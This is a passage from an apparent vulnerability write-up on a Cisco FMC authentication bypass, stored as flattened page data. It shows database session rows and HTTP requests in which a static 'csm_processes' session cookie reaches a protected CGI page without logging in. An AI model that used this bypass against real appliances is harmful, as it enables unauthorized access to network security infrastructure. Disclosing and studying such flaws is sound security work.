1773962523",[1471,2376,2298],{"class":1487},[1471,2378,1524],{"class":1523},[1471,2380,2381],{"class":1527},"_SESSION_ATIME",[1471,2383,1524],{"class":1523},[1471,2385,1844],{"class":1516},[1471,2387,2374],{"class":2328},[1471,2389,2298],{"class":1487},[1471,2391,1524],{"class":1523},[1471,2393,2394],{"class":1527},"_SESSION_ID",[1471,2396,1524],{"class":1523},[1471,2398,1844],{"class":1516},[1471,2400,1569],{"class":1523},[1471,2402,1279],{"class":1527},[1471,2404,1524],{"class":1523},[1471,2406,2298],{"class":1487},[1471,2408,1524],{"class":1523},[1471,2410,2411],{"class":1527},"active",[1471,2413,1524],{"class":1523},[1471,2415,1844],{"class":1516},[1471,2417,2418],{"class":2328}," 0",[1471,2420,2298],{"class":1487},[1471,2422,1524],{"class":1523},[1471,2424,2425],{"class":1527},"_SESSION_REMOTE_ADDR",[1471,2427,1524],{"class":1523},[1471,2429,1844],{"class":1516},[1471,2431,2432],{"class":1523}," ''",[1471,2434,2298],{"class":1487},[1471,2436,1524],{"class":1523},[1471,2438,2439],{"class":1527},"_SESSION_EXPIRE_LIST",[1471,2441,1524],{"class":1523},[1471,2443,1844],{"class":1516},[1471,2445,2446],{"class":1487}," 
{},",[1471,2448,1524],{"class":1523},[1471,2450,2451],{"class":1527},"VMS_SESSION_ID",[1471,2453,1524],{"class":1523},[1471,2455,1844],{"class":1516},[1471,2457,1569],{"class":1523},[1471,2459,1279],{"class":1527},[1471,2461,1524],{"class":1523},[1471,2463,2298],{"class":1487},[1471,2465,1524],{"class":1523},[1471,2467,2468],{"class":1527},"current_domain",[1471,2470,1524],{"class":1523},[1471,2472,1844],{"class":1516},[1471,2474,1569],{"class":1523},[1471,2476,2312],{"class":1527},[1471,2478,1524],{"class":1523},[1471,2480,2481],{"class":1487},"};;$D |\n",[184,2483,2484,2485,2487,2488,2491],{},"Notably, the ",[1277,2486,1283],{}," database and table are the same locations where valid web UI authentications happen. No other machine accounts appear to have sessions created in this portion of the database, and the only other ",[1277,2489,2490],{},"a_session"," objects that get created are from user web authentication. A few things about the above:",[2493,2494,2495,2504],"ol",{},[230,2496,2497,2499,2500,2503],{},[1277,2498,2411],{}," set to ",[1277,2501,2502],{},"0"," means that the session is active",[230,2505,2506,2499,2508,2510,2511,2514],{},[1277,2507,2321],{},[1277,2509,454],{}," means that the session expiration ",[1374,2512,2513],{},"is"," checked",[184,2516,2517],{},"Additionally, when a user logs into the web UI, normally the session looks like the following:",[1449,2519,2521],{"className":2232,"code":2520,"language":2234,"meta":148,"style":148},"MariaDB [(none)]> SELECT a_session FROM sfsnort.sessions;\n| a_session |\n| $D = {'active' => 0,'last_csm_refresh' => 1774465805,'sf_action_id' => 'a490cd6e67ccde81d131684846d7a13c','original_domain' => 'e276abec-e0f2-11e3-8169-6d9ed49b625f','_SESSION_CTIME' => 1774465805,'_SESSION_EXPIRE_LIST' => {'session_expire_check' => 3600},'username' => 'admin','session_expire_check' => 1,'user_access_type' => 'rw','last_login' => {'last_login_time' => 1773962153,'remote_host_ip' => '10.0.1.10'},'useruuid' => 
'68d03c42-d9bd-11dc-89f2-b7961d42c462','_SESSION_REMOTE_ADDR' => '10.0.1.10','current_domain' => 'e276abec-e0f2-11e3-8169-6d9ed49b625f','domains' => '[{\"name\":\"Global\",\"uuid\":\"e276abec-e0f2-11e3-8169-6d9ed49b625f\"}]','_SESSION_ATIME' => 1774465819,'IS_WORKFLOW_MODE' => 'false','VMS_SESSION_ID' => '-1102361566','usertype' => 1,'_SESSION_ID' => '80a3ec54ed31807a655fb7d2018c69cf','_SESSION_ETIME' => 3900};;$D |\n| $D = {'_SESSION_ATIME' => 1774465771,'original_domain' => 'e276abec-e0f2-11e3-8169-6d9ed49b625f','useruuid' => '8acb8f4a-c40d-11e3-95aa-54f999c07ac9','current_domain' => 'e276abec-e0f2-11e3-8169-6d9ed49b625f','_SESSION_EXPIRE_LIST' => {},'usertype' => 2,'_SESSION_CTIME' => 1774465771,'active' => 0,'_SESSION_ID' => 'csm_processes','VMS_SESSION_ID' => 'csm_processes','session_expire_check' => 1,'_SESSION_REMOTE_ADDR' => '','username' => 'csm_processes'};;$D |\n",[1277,2522,2523,2543,2548,2899],{"__ignoreMap":148},[1471,2524,2525,2527,2529,2531,2533,2535,2537,2539,2541],{"class":1473,"line":1474},[1471,2526,2241],{"class":1487},[1471,2528,2244],{"class":1516},[1471,2530,2248],{"class":2247},[1471,2532,2251],{"class":1487},[1471,2534,2254],{"class":2247},[1471,2536,2258],{"class":2257},[1471,2538,1201],{"class":1487},[1471,2540,2263],{"class":2257},[1471,2542,1770],{"class":1487},[1471,2544,2545],{"class":1473,"line":149},[1471,2546,2547],{"class":1487},"| a_session 
|\n",[1471,2549,2550,2552,2554,2556,2558,2560,2562,2564,2566,2568,2570,2573,2575,2577,2580,2582,2584,2586,2588,2590,2592,2595,2597,2599,2601,2603,2605,2607,2609,2611,2613,2615,2617,2619,2621,2623,2625,2627,2629,2631,2633,2635,2637,2639,2641,2643,2645,2648,2651,2653,2655,2657,2659,2661,2664,2666,2668,2670,2672,2674,2676,2678,2680,2682,2685,2687,2689,2691,2694,2696,2698,2700,2703,2705,2707,2709,2711,2714,2716,2718,2721,2723,2725,2728,2730,2732,2734,2737,2739,2741,2743,2745,2747,2749,2751,2754,2756,2758,2760,2762,2764,2766,2768,2770,2772,2774,2776,2778,2780,2782,2784,2786,2788,2790,2792,2795,2797,2799,2801,2804,2806,2808,2810,2812,2814,2816,2819,2821,2823,2826,2828,2830,2832,2835,2837,2839,2841,2843,2845,2847,2849,2852,2854,2856,2858,2860,2862,2864,2866,2868,2870,2872,2874,2876,2878,2881,2883,2885,2887,2890,2892,2894,2897],{"class":1473,"line":1498},[1471,2551,2275],{"class":1487},[1471,2553,2278],{"class":1516},[1471,2555,2281],{"class":1487},[1471,2557,1524],{"class":1523},[1471,2559,2411],{"class":1527},[1471,2561,1524],{"class":1523},[1471,2563,1844],{"class":1516},[1471,2565,2418],{"class":2328},[1471,2567,2298],{"class":1487},[1471,2569,1524],{"class":1523},[1471,2571,2572],{"class":1527},"last_csm_refresh",[1471,2574,1524],{"class":1523},[1471,2576,1844],{"class":1516},[1471,2578,2579],{"class":2328}," 
1774465805",[1471,2581,2298],{"class":1487},[1471,2583,1524],{"class":1523},[1471,2585,1306],{"class":1527},[1471,2587,1524],{"class":1523},[1471,2589,1844],{"class":1516},[1471,2591,1569],{"class":1523},[1471,2593,2594],{"class":1527},"a490cd6e67ccde81d131684846d7a13c",[1471,2596,1524],{"class":1523},[1471,2598,2298],{"class":1487},[1471,2600,1524],{"class":1523},[1471,2602,2303],{"class":1527},[1471,2604,1524],{"class":1523},[1471,2606,1844],{"class":1516},[1471,2608,1569],{"class":1523},[1471,2610,2312],{"class":1527},[1471,2612,1524],{"class":1523},[1471,2614,2298],{"class":1487},[1471,2616,1524],{"class":1523},[1471,2618,2367],{"class":1527},[1471,2620,1524],{"class":1523},[1471,2622,1844],{"class":1516},[1471,2624,2579],{"class":2328},[1471,2626,2298],{"class":1487},[1471,2628,1524],{"class":1523},[1471,2630,2439],{"class":1527},[1471,2632,1524],{"class":1523},[1471,2634,1844],{"class":1516},[1471,2636,2281],{"class":1487},[1471,2638,1524],{"class":1523},[1471,2640,2321],{"class":1527},[1471,2642,1524],{"class":1523},[1471,2644,1844],{"class":1516},[1471,2646,2647],{"class":2328}," 
3600",[1471,2649,2650],{"class":1487},"},",[1471,2652,1524],{"class":1523},[1471,2654,1726],{"class":1527},[1471,2656,1524],{"class":1523},[1471,2658,1844],{"class":1516},[1471,2660,1569],{"class":1523},[1471,2662,2663],{"class":1527},"admin",[1471,2665,1524],{"class":1523},[1471,2667,2298],{"class":1487},[1471,2669,1524],{"class":1523},[1471,2671,2321],{"class":1527},[1471,2673,1524],{"class":1523},[1471,2675,1844],{"class":1516},[1471,2677,2329],{"class":2328},[1471,2679,2298],{"class":1487},[1471,2681,1524],{"class":1523},[1471,2683,2684],{"class":1527},"user_access_type",[1471,2686,1524],{"class":1523},[1471,2688,1844],{"class":1516},[1471,2690,1569],{"class":1523},[1471,2692,2693],{"class":1527},"rw",[1471,2695,1524],{"class":1523},[1471,2697,2298],{"class":1487},[1471,2699,1524],{"class":1523},[1471,2701,2702],{"class":1527},"last_login",[1471,2704,1524],{"class":1523},[1471,2706,1844],{"class":1516},[1471,2708,2281],{"class":1487},[1471,2710,1524],{"class":1523},[1471,2712,2713],{"class":1527},"last_login_time",[1471,2715,1524],{"class":1523},[1471,2717,1844],{"class":1516},[1471,2719,2720],{"class":2328}," 
1773962153",[1471,2722,2298],{"class":1487},[1471,2724,1524],{"class":1523},[1471,2726,2727],{"class":1527},"remote_host_ip",[1471,2729,1524],{"class":1523},[1471,2731,1844],{"class":1516},[1471,2733,1569],{"class":1523},[1471,2735,2736],{"class":1527},"10.0.1.10",[1471,2738,1524],{"class":1523},[1471,2740,2650],{"class":1487},[1471,2742,1524],{"class":1523},[1471,2744,2336],{"class":1527},[1471,2746,1524],{"class":1523},[1471,2748,1844],{"class":1516},[1471,2750,1569],{"class":1523},[1471,2752,2753],{"class":1527},"68d03c42-d9bd-11dc-89f2-b7961d42c462",[1471,2755,1524],{"class":1523},[1471,2757,2298],{"class":1487},[1471,2759,1524],{"class":1523},[1471,2761,2425],{"class":1527},[1471,2763,1524],{"class":1523},[1471,2765,1844],{"class":1516},[1471,2767,1569],{"class":1523},[1471,2769,2736],{"class":1527},[1471,2771,1524],{"class":1523},[1471,2773,2298],{"class":1487},[1471,2775,1524],{"class":1523},[1471,2777,2468],{"class":1527},[1471,2779,1524],{"class":1523},[1471,2781,1844],{"class":1516},[1471,2783,1569],{"class":1523},[1471,2785,2312],{"class":1527},[1471,2787,1524],{"class":1523},[1471,2789,2298],{"class":1487},[1471,2791,1524],{"class":1523},[1471,2793,2794],{"class":1527},"domains",[1471,2796,1524],{"class":1523},[1471,2798,1844],{"class":1516},[1471,2800,1569],{"class":1523},[1471,2802,2803],{"class":1527},"[{\"name\":\"Global\",\"uuid\":\"e276abec-e0f2-11e3-8169-6d9ed49b625f\"}]",[1471,2805,1524],{"class":1523},[1471,2807,2298],{"class":1487},[1471,2809,1524],{"class":1523},[1471,2811,2381],{"class":1527},[1471,2813,1524],{"class":1523},[1471,2815,1844],{"class":1516},[1471,2817,2818],{"class":2328}," 
1774465819",[1471,2820,2298],{"class":1487},[1471,2822,1524],{"class":1523},[1471,2824,2825],{"class":1527},"IS_WORKFLOW_MODE",[1471,2827,1524],{"class":1523},[1471,2829,1844],{"class":1516},[1471,2831,1569],{"class":1523},[1471,2833,2834],{"class":1527},"false",[1471,2836,1524],{"class":1523},[1471,2838,2298],{"class":1487},[1471,2840,1524],{"class":1523},[1471,2842,2451],{"class":1527},[1471,2844,1524],{"class":1523},[1471,2846,1844],{"class":1516},[1471,2848,1569],{"class":1523},[1471,2850,2851],{"class":1527},"-1102361566",[1471,2853,1524],{"class":1523},[1471,2855,2298],{"class":1487},[1471,2857,1524],{"class":1523},[1471,2859,1528],{"class":1527},[1471,2861,1524],{"class":1523},[1471,2863,1844],{"class":1516},[1471,2865,2329],{"class":2328},[1471,2867,2298],{"class":1487},[1471,2869,1524],{"class":1523},[1471,2871,2394],{"class":1527},[1471,2873,1524],{"class":1523},[1471,2875,1844],{"class":1516},[1471,2877,1569],{"class":1523},[1471,2879,2880],{"class":1527},"80a3ec54ed31807a655fb7d2018c69cf",[1471,2882,1524],{"class":1523},[1471,2884,2298],{"class":1487},[1471,2886,1524],{"class":1523},[1471,2888,2889],{"class":1527},"_SESSION_ETIME",[1471,2891,1524],{"class":1523},[1471,2893,1844],{"class":1516},[1471,2895,2896],{"class":2328}," 
3900",[1471,2898,2481],{"class":1487},[1471,2900,2901,2903,2905,2907,2909,2911,2913,2915,2918,2920,2922,2924,2926,2928,2930,2932,2934,2936,2938,2940,2942,2944,2946,2948,2950,2952,2954,2956,2958,2960,2962,2964,2966,2968,2970,2972,2974,2976,2978,2980,2982,2984,2986,2988,2990,2992,2994,2996,2998,3000,3002,3004,3006,3008,3010,3012,3014,3016,3018,3020,3022,3024,3026,3028,3030,3032,3034,3036,3038,3040,3042,3044,3046,3048,3050,3052,3054,3056,3058,3060,3062,3064,3066,3068,3070,3072,3074,3076,3078,3080,3082,3084],{"class":1473,"line":1536},[1471,2902,2275],{"class":1487},[1471,2904,2278],{"class":1516},[1471,2906,2281],{"class":1487},[1471,2908,1524],{"class":1523},[1471,2910,2381],{"class":1527},[1471,2912,1524],{"class":1523},[1471,2914,1844],{"class":1516},[1471,2916,2917],{"class":2328}," 1774465771",[1471,2919,2298],{"class":1487},[1471,2921,1524],{"class":1523},[1471,2923,2303],{"class":1527},[1471,2925,1524],{"class":1523},[1471,2927,1844],{"class":1516},[1471,2929,1569],{"class":1523},[1471,2931,2312],{"class":1527},[1471,2933,1524],{"class":1523},[1471,2935,2298],{"class":1487},[1471,2937,1524],{"class":1523},[1471,2939,2336],{"class":1527},[1471,2941,1524],{"class":1523},[1471,2943,1844],{"class":1516},[1471,2945,1569],{"class":1523},[1471,2947,2345],{"class":1527},[1471,2949,1524],{"class":1523},[1471,2951,2298],{"class":1487},[1471,2953,1524],{"class":1523},[1471,2955,2468],{"class":1527},[1471,2957,1524],{"class":1523},[1471,2959,1844],{"class":1516},[1471,2961,1569],{"class":1523},[1471,2963,2312],{"class":1527},[1471,2965,1524],{"class":1523},[1471,2967,2298],{"class":1487},[1471,2969,1524],{"class":1523},[1471,2971,2439],{"class":1527},[1471,2973,1524],{"class":1523},[1471,2975,1844],{"class":1516},[1471,2977,2446],{"class":1487},[1471,2979,1524],{"class":1523},[1471,2981,1528],{"class":1527},[1471,2983,1524],{"class":1523},[1471,2985,1844],{"class":1516},[1471,2987,2360],{"class":2328},[1471,2989,2298],{"class":1487},[1471,2991,1524],{"class":1523},[1471,299
3,2367],{"class":1527},[1471,2995,1524],{"class":1523},[1471,2997,1844],{"class":1516},[1471,2999,2917],{"class":2328},[1471,3001,2298],{"class":1487},[1471,3003,1524],{"class":1523},[1471,3005,2411],{"class":1527},[1471,3007,1524],{"class":1523},[1471,3009,1844],{"class":1516},[1471,3011,2418],{"class":2328},[1471,3013,2298],{"class":1487},[1471,3015,1524],{"class":1523},[1471,3017,2394],{"class":1527},[1471,3019,1524],{"class":1523},[1471,3021,1844],{"class":1516},[1471,3023,1569],{"class":1523},[1471,3025,1279],{"class":1527},[1471,3027,1524],{"class":1523},[1471,3029,2298],{"class":1487},[1471,3031,1524],{"class":1523},[1471,3033,2451],{"class":1527},[1471,3035,1524],{"class":1523},[1471,3037,1844],{"class":1516},[1471,3039,1569],{"class":1523},[1471,3041,1279],{"class":1527},[1471,3043,1524],{"class":1523},[1471,3045,2298],{"class":1487},[1471,3047,1524],{"class":1523},[1471,3049,2321],{"class":1527},[1471,3051,1524],{"class":1523},[1471,3053,1844],{"class":1516},[1471,3055,2329],{"class":2328},[1471,3057,2298],{"class":1487},[1471,3059,1524],{"class":1523},[1471,3061,2425],{"class":1527},[1471,3063,1524],{"class":1523},[1471,3065,1844],{"class":1516},[1471,3067,2432],{"class":1523},[1471,3069,2298],{"class":1487},[1471,3071,1524],{"class":1523},[1471,3073,1726],{"class":1527},[1471,3075,1524],{"class":1523},[1471,3077,1844],{"class":1516},[1471,3079,1569],{"class":1523},[1471,3081,1279],{"class":1527},[1471,3083,1524],{"class":1523},[1471,3085,2481],{"class":1487},[184,3087,3088],{},"This shows that a few more things are missing or different between the machine user authentication and the admin user authentication:",[227,3090,3091,3103],{},[230,3092,3093,1925,3095,1925,3097,3099,3100,3102],{},[1277,3094,2684],{},[1277,3096,1306],{},[1277,3098,2794],{},", and more are not present in the ",[1277,3101,1279],{}," session object.",[230,3104,3105,3106,3108,3109],{},"Some of the values appear to differ in content type, notably ",[1277,3107,2394],{}," parameters and 
",[1277,3110,2394],{},[184,3112,3113,3114,3116,3117,3120,3121,3124,3125,3128],{},"The most interesting part for now is that the ",[1277,3115,2394],{}," value corresponds to the web UI admin user’s ",[1277,3118,3119],{},"CGISESSID=80a3ec54ed31807a655fb7d2018c69cf"," cookie value and is generated dynamically for normal user authentication. Immediately, we attempt to set ",[1277,3122,3123],{},"CGISESSID"," to be ",[1277,3126,3127],{},"CGISESSID=csm_processes"," in order to correspond to the startup process value.",[184,3130,3131,3132,3135],{},"Sure enough, a request to the ",[1277,3133,3134],{},"\u002Fhelp\u002Fabout.cgi"," CGI endpoint without a cookie set returns an invalid session error:",[1449,3137,3141],{"className":3138,"code":3139,"language":3140,"meta":148,"style":148},"language-http shiki shiki-themes material-theme-lighter github-light github-dark monokai","GET \u002Fhelp\u002Fabout.cgi HTTP\u002F1.1\nHost: 10.0.0.226\nUser-Agent: Mozilla\u002F5.0 (X11; Linux x86_64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F142.0.0.0 Safari\u002F537.36\nAccept-Encoding: gzip, deflate, br\nConnection: keep-alive\n\n\n","http",[1277,3142,3143,3159,3170,3180,3190],{"__ignoreMap":148},[1471,3144,3145,3148,3151,3154,3156],{"class":1473,"line":1474},[1471,3146,3147],{"class":1483},"GET",[1471,3149,3150],{"class":1487}," \u002Fhelp\u002Fabout.cgi ",[1471,3152,3153],{"class":2247},"HTTP",[1471,3155,55],{"class":1487},[1471,3157,3158],{"class":2328},"1.1\n",[1471,3160,3161,3165,3167],{"class":1473,"line":149},[1471,3162,3164],{"class":3163},"sHsBP","Host",[1471,3166,1447],{"class":2247},[1471,3168,3169],{"class":1527}," 10.0.0.226\n",[1471,3171,3172,3175,3177],{"class":1473,"line":1498},[1471,3173,3174],{"class":3163},"User-Agent",[1471,3176,1447],{"class":2247},[1471,3178,3179],{"class":1527}," Mozilla\u002F5.0 (X11; Linux x86_64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F142.0.0.0 
Safari\u002F537.36\n",[1471,3181,3182,3185,3187],{"class":1473,"line":1536},[1471,3183,3184],{"class":3163},"Accept-Encoding",[1471,3186,1447],{"class":2247},[1471,3188,3189],{"class":1527}," gzip, deflate, br\n",[1471,3191,3192,3195,3197],{"class":1473,"line":1546},[1471,3193,3194],{"class":3163},"Connection",[1471,3196,1447],{"class":2247},[1471,3198,3199],{"class":1527}," keep-alive\n",[1449,3201,3203],{"className":3138,"code":3202,"language":3140,"meta":148,"style":148},"HTTP\u002F1.1 302 Found\nDate: Wed, 25 Mar 2026 19:30:07 GMT\nServer: Mojolicious (Perl)\nStrict-Transport-Security: max-age=31536000; includeSubDomains\nContent-Type: text\u002Fplain; charset=utf-8\nLocation: \u002Fui\u002Flogin?target=%2Fmojo-async%2Fhelp%2Fabout.cgi\nContent-Length: 19\nCache-Control: no-store\nX-Frame-Options: SAMEORIGIN\nX-UA-Compatible: IE=edge\nX-Permitted-Cross-Domain-Policies: none\nX-XSS-Protection: 1; mode=block\nReferrer-Policy: same-origin\nContent-Security-Policy: base-uri 'self'; frame-ancestors 'self'\nX-Content-Type-Options: nosniff\nKeep-Alive: timeout=5, max=100\nConnection: Keep-Alive\n\nInvalid session ID \n",[1277,3204,3205,3220,3230,3240,3250,3260,3270,3280,3290,3300,3310,3320,3330,3340,3350,3360,3370,3379,3384],{"__ignoreMap":148},[1471,3206,3207,3209,3211,3214,3217],{"class":1473,"line":1474},[1471,3208,3153],{"class":2247},[1471,3210,55],{"class":1487},[1471,3212,3213],{"class":2328},"1.1",[1471,3215,3216],{"class":2328}," 302",[1471,3218,3219],{"class":1527}," Found\n",[1471,3221,3222,3225,3227],{"class":1473,"line":149},[1471,3223,3224],{"class":3163},"Date",[1471,3226,1447],{"class":2247},[1471,3228,3229],{"class":1527}," Wed, 25 Mar 2026 19:30:07 GMT\n",[1471,3231,3232,3235,3237],{"class":1473,"line":1498},[1471,3233,3234],{"class":3163},"Server",[1471,3236,1447],{"class":2247},[1471,3238,3239],{"class":1527}," Mojolicious 
(Perl)\n",[1471,3241,3242,3245,3247],{"class":1473,"line":1536},[1471,3243,3244],{"class":3163},"Strict-Transport-Security",[1471,3246,1447],{"class":2247},[1471,3248,3249],{"class":1527}," max-age=31536000; includeSubDomains\n",[1471,3251,3252,3255,3257],{"class":1473,"line":1546},[1471,3253,3254],{"class":3163},"Content-Type",[1471,3256,1447],{"class":2247},[1471,3258,3259],{"class":1527}," text\u002Fplain; charset=utf-8\n",[1471,3261,3262,3265,3267],{"class":1473,"line":1580},[1471,3263,3264],{"class":3163},"Location",[1471,3266,1447],{"class":2247},[1471,3268,3269],{"class":1527}," \u002Fui\u002Flogin?target=%2Fmojo-async%2Fhelp%2Fabout.cgi\n",[1471,3271,3272,3275,3277],{"class":1473,"line":1612},[1471,3273,3274],{"class":3163},"Content-Length",[1471,3276,1447],{"class":2247},[1471,3278,3279],{"class":1527}," 19\n",[1471,3281,3282,3285,3287],{"class":1473,"line":1624},[1471,3283,3284],{"class":3163},"Cache-Control",[1471,3286,1447],{"class":2247},[1471,3288,3289],{"class":1527}," no-store\n",[1471,3291,3292,3295,3297],{"class":1473,"line":1648},[1471,3293,3294],{"class":3163},"X-Frame-Options",[1471,3296,1447],{"class":2247},[1471,3298,3299],{"class":1527}," SAMEORIGIN\n",[1471,3301,3302,3305,3307],{"class":1473,"line":1654},[1471,3303,3304],{"class":3163},"X-UA-Compatible",[1471,3306,1447],{"class":2247},[1471,3308,3309],{"class":1527}," IE=edge\n",[1471,3311,3312,3315,3317],{"class":1473,"line":1662},[1471,3313,3314],{"class":3163},"X-Permitted-Cross-Domain-Policies",[1471,3316,1447],{"class":2247},[1471,3318,3319],{"class":1527}," none\n",[1471,3321,3322,3325,3327],{"class":1473,"line":1673},[1471,3323,3324],{"class":3163},"X-XSS-Protection",[1471,3326,1447],{"class":2247},[1471,3328,3329],{"class":1527}," 1; mode=block\n",[1471,3331,3332,3335,3337],{"class":1473,"line":1681},[1471,3333,3334],{"class":3163},"Referrer-Policy",[1471,3336,1447],{"class":2247},[1471,3338,3339],{"class":1527}," 
same-origin\n",[1471,3341,3342,3345,3347],{"class":1473,"line":1691},[1471,3343,3344],{"class":3163},"Content-Security-Policy",[1471,3346,1447],{"class":2247},[1471,3348,3349],{"class":1527}," base-uri 'self'; frame-ancestors 'self'\n",[1471,3351,3352,3355,3357],{"class":1473,"line":1699},[1471,3353,3354],{"class":3163},"X-Content-Type-Options",[1471,3356,1447],{"class":2247},[1471,3358,3359],{"class":1527}," nosniff\n",[1471,3361,3362,3365,3367],{"class":1473,"line":1705},[1471,3363,3364],{"class":3163},"Keep-Alive",[1471,3366,1447],{"class":2247},[1471,3368,3369],{"class":1527}," timeout=5, max=100\n",[1471,3371,3372,3374,3376],{"class":1473,"line":1733},[1471,3373,3194],{"class":3163},[1471,3375,1447],{"class":2247},[1471,3377,3378],{"class":1527}," Keep-Alive\n",[1471,3380,3381],{"class":1473,"line":1773},[1471,3382,3383],{"emptyLinePlaceholder":54},"\n",[1471,3385,3386],{"class":1473,"line":1789},[1471,3387,3388],{"class":1487},"Invalid session ID\n",[184,3390,3391,3392,3394,3395,3398],{},"But, with our special ",[1277,3393,1279],{}," session ID, we reach the page and get an HTTP ",[1277,3396,3397],{},"200"," response, and the system data renders:",[1449,3400,3402],{"className":3138,"code":3401,"language":3140,"meta":148,"style":148},"GET \u002Fhelp\u002Fabout.cgi HTTP\u002F1.1\nHost: 10.0.0.226\nCookie: CGISESSID=csm_processes\nUser-Agent: Mozilla\u002F5.0 (X11; Linux x86_64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F142.0.0.0 Safari\u002F537.36\nAccept-Encoding: gzip, deflate, br\nConnection: 
keep-alive\n\n\n",[1277,3403,3404,3416,3424,3434,3442,3450],{"__ignoreMap":148},[1471,3405,3406,3408,3410,3412,3414],{"class":1473,"line":1474},[1471,3407,3147],{"class":1483},[1471,3409,3150],{"class":1487},[1471,3411,3153],{"class":2247},[1471,3413,55],{"class":1487},[1471,3415,3158],{"class":2328},[1471,3417,3418,3420,3422],{"class":1473,"line":149},[1471,3419,3164],{"class":3163},[1471,3421,1447],{"class":2247},[1471,3423,3169],{"class":1527},[1471,3425,3426,3429,3431],{"class":1473,"line":1498},[1471,3427,3428],{"class":3163},"Cookie",[1471,3430,1447],{"class":2247},[1471,3432,3433],{"class":1527}," CGISESSID=csm_processes\n",[1471,3435,3436,3438,3440],{"class":1473,"line":1536},[1471,3437,3174],{"class":3163},[1471,3439,1447],{"class":2247},[1471,3441,3179],{"class":1527},[1471,3443,3444,3446,3448],{"class":1473,"line":1546},[1471,3445,3184],{"class":3163},[1471,3447,1447],{"class":2247},[1471,3449,3189],{"class":1527},[1471,3451,3452,3454,3456],{"class":1473,"line":1580},[1471,3453,3194],{"class":3163},[1471,3455,1447],{"class":2247},[1471,3457,3199],{"class":1527},[1449,3459,3461],{"className":3138,"code":3460,"language":3140,"meta":148,"style":148},"HTTP\u002F1.1 200 OK\nDate: Wed, 25 Mar 2026 19:28:23 GMT\nServer: Mojolicious (Perl)\nStrict-Transport-Security: max-age=31536000; includeSubDomains\nVary: Accept-Encoding\nCache-Control: no-store\nX-Frame-Options: SAMEORIGIN\nX-UA-Compatible: IE=edge\nX-Permitted-Cross-Domain-Policies: none\nX-XSS-Protection: 1; mode=block\nReferrer-Policy: same-origin\nContent-Security-Policy: base-uri 'self'; frame-ancestors 'self'\nX-Content-Type-Options: nosniff\nContent-Length: 25555\nKeep-Alive: timeout=5, max=100\nConnection: Keep-Alive\nContent-Type: text\u002Fhtml; charset=utf-8\n\n\u003C!DOCTYPE 
html>\n\n\n\n...snip...\n",[1277,3462,3463,3477,3486,3494,3502,3512,3520,3528,3536,3544,3552,3560,3568,3576,3585,3593,3601,3610,3614,3629,3633,3637,3642],{"__ignoreMap":148},[1471,3464,3465,3467,3469,3471,3474],{"class":1473,"line":1474},[1471,3466,3153],{"class":2247},[1471,3468,55],{"class":1487},[1471,3470,3213],{"class":2328},[1471,3472,3473],{"class":2328}," 200",[1471,3475,3476],{"class":1527}," OK\n",[1471,3478,3479,3481,3483],{"class":1473,"line":149},[1471,3480,3224],{"class":3163},[1471,3482,1447],{"class":2247},[1471,3484,3485],{"class":1527}," Wed, 25 Mar 2026 19:28:23 GMT\n",[1471,3487,3488,3490,3492],{"class":1473,"line":1498},[1471,3489,3234],{"class":3163},[1471,3491,1447],{"class":2247},[1471,3493,3239],{"class":1527},[1471,3495,3496,3498,3500],{"class":1473,"line":1536},[1471,3497,3244],{"class":3163},[1471,3499,1447],{"class":2247},[1471,3501,3249],{"class":1527},[1471,3503,3504,3507,3509],{"class":1473,"line":1546},[1471,3505,3506],{"class":3163},"Vary",[1471,3508,1447],{"class":2247},[1471,3510,3511],{"class":1527}," 
Accept-Encoding\n",[1471,3513,3514,3516,3518],{"class":1473,"line":1580},[1471,3515,3284],{"class":3163},[1471,3517,1447],{"class":2247},[1471,3519,3289],{"class":1527},[1471,3521,3522,3524,3526],{"class":1473,"line":1612},[1471,3523,3294],{"class":3163},[1471,3525,1447],{"class":2247},[1471,3527,3299],{"class":1527},[1471,3529,3530,3532,3534],{"class":1473,"line":1624},[1471,3531,3304],{"class":3163},[1471,3533,1447],{"class":2247},[1471,3535,3309],{"class":1527},[1471,3537,3538,3540,3542],{"class":1473,"line":1648},[1471,3539,3314],{"class":3163},[1471,3541,1447],{"class":2247},[1471,3543,3319],{"class":1527},[1471,3545,3546,3548,3550],{"class":1473,"line":1654},[1471,3547,3324],{"class":3163},[1471,3549,1447],{"class":2247},[1471,3551,3329],{"class":1527},[1471,3553,3554,3556,3558],{"class":1473,"line":1662},[1471,3555,3334],{"class":3163},[1471,3557,1447],{"class":2247},[1471,3559,3339],{"class":1527},[1471,3561,3562,3564,3566],{"class":1473,"line":1673},[1471,3563,3344],{"class":3163},[1471,3565,1447],{"class":2247},[1471,3567,3349],{"class":1527},[1471,3569,3570,3572,3574],{"class":1473,"line":1681},[1471,3571,3354],{"class":3163},[1471,3573,1447],{"class":2247},[1471,3575,3359],{"class":1527},[1471,3577,3578,3580,3582],{"class":1473,"line":1691},[1471,3579,3274],{"class":3163},[1471,3581,1447],{"class":2247},[1471,3583,3584],{"class":1527}," 25555\n",[1471,3586,3587,3589,3591],{"class":1473,"line":1699},[1471,3588,3364],{"class":3163},[1471,3590,1447],{"class":2247},[1471,3592,3369],{"class":1527},[1471,3594,3595,3597,3599],{"class":1473,"line":1705},[1471,3596,3194],{"class":3163},[1471,3598,1447],{"class":2247},[1471,3600,3378],{"class":1527},[1471,3602,3603,3605,3607],{"class":1473,"line":1733},[1471,3604,3254],{"class":3163},[1471,3606,1447],{"class":2247},[1471,3608,3609],{"class":1527}," text\u002Fhtml; 
charset=utf-8\n",[1471,3611,3612],{"class":1473,"line":1773},[1471,3613,3383],{"emptyLinePlaceholder":54},[1471,3615,3616,3619,3622,3626],{"class":1473,"line":1789},[1471,3617,3618],{"class":1491},"\u003C!",[1471,3620,3621],{"class":2247},"DOCTYPE",[1471,3623,3625],{"class":3624},"sSsL9"," html",[1471,3627,3628],{"class":1491},">\n",[1471,3630,3631],{"class":1473,"line":1805},[1471,3632,3383],{"emptyLinePlaceholder":54},[1471,3634,3635],{"class":1473,"line":50},[1471,3636,3383],{"emptyLinePlaceholder":54},[1471,3638,3640],{"class":1473,"line":3639},22,[1471,3641,3383],{"emptyLinePlaceholder":54},[1471,3643,3645],{"class":1473,"line":3644},23,[1471,3646,3647],{"class":1487},"...snip...\n",[184,3649,3650],{},[187,3651],{"alt":3652,"src":3653},"Authentication bypass for the auth dialogue.","\u002Fblog\u002Fcisco-fmc-auth-bypass-cve-2026-20079\u002Fhelp-dialog.png",[184,3655,3656],{},"Sweet! It appears we found the issue, and it 